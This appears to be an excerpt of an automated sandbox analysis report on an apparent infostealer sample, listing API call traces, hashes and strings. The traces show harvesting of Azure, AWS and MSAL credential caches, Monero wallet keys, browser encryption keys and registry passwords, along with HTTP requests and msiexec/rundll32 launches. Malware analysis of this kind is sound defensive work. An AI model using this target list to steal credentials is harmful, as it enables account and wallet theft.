                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                              • Instruction ID: 3f089b1bdefd73cc9cad1ba060acf4c3effa55405a80c650d604da3c3ce8108a
                              • Opcode Fuzzy Hash: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                              • Instruction Fuzzy Hash: 7481E9B191011CAADB24DF54CC95FEAB7B8FF08700F10C299E24AA6180DF756B85CFA5
                              APIs
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00DF4DCD
                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                                • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00DF4E59
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                                • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                                • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00DF4EE5
                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49B0
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E008D2), ref: 00DF49C5
                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49E2
                                • Part of subcall function 00DF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00DF4A1E
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,0197F168), ref: 00DF4A4A
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FF8), ref: 00DF4A5C
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A70
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FFC), ref: 00DF4A82
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A96
                                • Part of subcall function 00DF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00DF4AAC
                                • Part of subcall function 00DF4910: DeleteFileA.KERNEL32(?), ref: 00DF4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 3faba08c3af28a23587f05be73614eb1874adef883078ddd8a05454207da64f7
                              • Instruction ID: 9fa994384c9c535d649e9dff0970656319d2ee21192f2bdd4ac852fae363afb0
                              • Opcode Fuzzy Hash: 3faba08c3af28a23587f05be73614eb1874adef883078ddd8a05454207da64f7
                              • Instruction Fuzzy Hash: 674134BAA4030867DB64F770DC47FED7238AB64700F408594B689660C5EEF55BC98BB2
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                              • Instruction ID: c892d95941ad8e07dc0fd19c187c92a19c8d39e3bb643839c34ab3ca217bf6dd
                              • Opcode Fuzzy Hash: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                              • Instruction Fuzzy Hash: 3B71DE75A10208EBDB24EFE4D899FEDB7B8FB48700F108518F655A7284DB79A905CB70
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                              • Instruction ID: 9d19018d75c661d0e814823977b029c6a49a5106de92851e9ceb07bc7b1f90e3
                              • Opcode Fuzzy Hash: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                              • Instruction Fuzzy Hash: BB120AB180011C9ADB14EBA4CC92FFEB738EF14340F558169E60A66195EF746B4ACF72
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                                • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6303
                                • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                                • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE6385
                                • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                                • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                              • lstrlen.KERNEL32(00000000), ref: 00DF532F
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                              • lstrlen.KERNEL32(00000000), ref: 00DF5383
                              • lstrlen.KERNEL32(00000000), ref: 00DF53AE
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 01cdcae6fd19d1032e98439ef5fe5296c7c72aec7665c78604d391a7f65bd52c
                              • Instruction ID: afa53f67dce48a85b6d2a34c05295f8c277d57ac597e948399c205c45a88f1b6
                              • Opcode Fuzzy Hash: 01cdcae6fd19d1032e98439ef5fe5296c7c72aec7665c78604d391a7f65bd52c
                              • Instruction Fuzzy Hash: 6C513AB091014D9BCB14FF68C992AFD3778EF10340F55C018EA0A6A595EF74AB45CB72
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: e4bd2a57ddbb077a2f80065831ff444832c0c173a2d7922e1152eec2ab8c53fd
                              • Instruction ID: 3289615a56167fb3fdffcd4f7a1bf4fbde501f193f4a78abf78fcbeaad9f71a6
                              • Opcode Fuzzy Hash: e4bd2a57ddbb077a2f80065831ff444832c0c173a2d7922e1152eec2ab8c53fd
                              • Instruction Fuzzy Hash: 50C172B5A0021DDBCB24EF60DC89FEA7378FF54304F118598E60AA7141DA75AA85CFB1
                              APIs
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF42EC
                              • lstrcat.KERNEL32(?,0197ED10), ref: 00DF430B
                              • lstrcat.KERNEL32(?,?), ref: 00DF431F
                              • lstrcat.KERNEL32(?,0197CE00), ref: 00DF4333
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                                • Part of subcall function 00DE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                                • Part of subcall function 00DF93C0: GlobalAlloc.KERNEL32(00000000,00DF43DD,00DF43DD), ref: 00DF93D3
                              • StrStrA.SHLWAPI(?,0197EE30), ref: 00DF43F3
                              • GlobalFree.KERNEL32(?), ref: 00DF4512
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                                • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                                • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF44A3
                              • StrCmpCA.SHLWAPI(?,00E008D1), ref: 00DF44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DF44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00DF44E5
                              • lstrcat.KERNEL32(00000000,00E00FB8), ref: 00DF44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 01c9d20967b58ceeb6e8c210b7d117e56c40c58383c455b3fdbec6349802b5bd
                              • Instruction ID: 50aa4f8b5c73b6b6150902118279d98c9dfb8f21a72b15bc7551c29acd1d5a73
                              • Opcode Fuzzy Hash: 01c9d20967b58ceeb6e8c210b7d117e56c40c58383c455b3fdbec6349802b5bd
                              • Instruction Fuzzy Hash: A37137B6900208ABCB24FBA4DC95FEE7379AB48300F148598F609A7185DE75DB45CFB1
                              APIs
                                • Part of subcall function 00DE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                                • Part of subcall function 00DE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                                • Part of subcall function 00DE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
                                • Part of subcall function 00DE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                                • Part of subcall function 00DE12A0: RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00DE134F
                              • lstrlen.KERNEL32(?), ref: 00DE135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00DE1377
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00DE1465
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00DE14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 694b7599c03a9d0d8ca99cff294e915b89dde7e5553e13e5718c4abb107936ce
                              • Instruction ID: 6c17fdf23f5395240724fc906552423c6f551bd5284bb0bc174584e66f93a9ab
                              • Opcode Fuzzy Hash: 694b7599c03a9d0d8ca99cff294e915b89dde7e5553e13e5718c4abb107936ce
                              • Instruction Fuzzy Hash: D1512EF195021997CB25FB64DD92AED737CEF50300F4181A8B70E66082EE746B89CBB5
                              APIs
                                • Part of subcall function 00DE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                                • Part of subcall function 00DE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                                • Part of subcall function 00DE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                                • Part of subcall function 00DE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                                • Part of subcall function 00DE72D0: HeapFree.KERNEL32(00000000), ref: 00DE7459
                              • lstrcat.KERNEL32(00000000,00E017FC), ref: 00DE7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DE7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00DE765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DE768F
                              • lstrcat.KERNEL32(00000000,00E01804), ref: 00DE76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DE76D3
                              • lstrcat.KERNEL32(00000000,00E01808), ref: 00DE76ED
                              • task.LIBCPMTD ref: 00DE76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                               • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
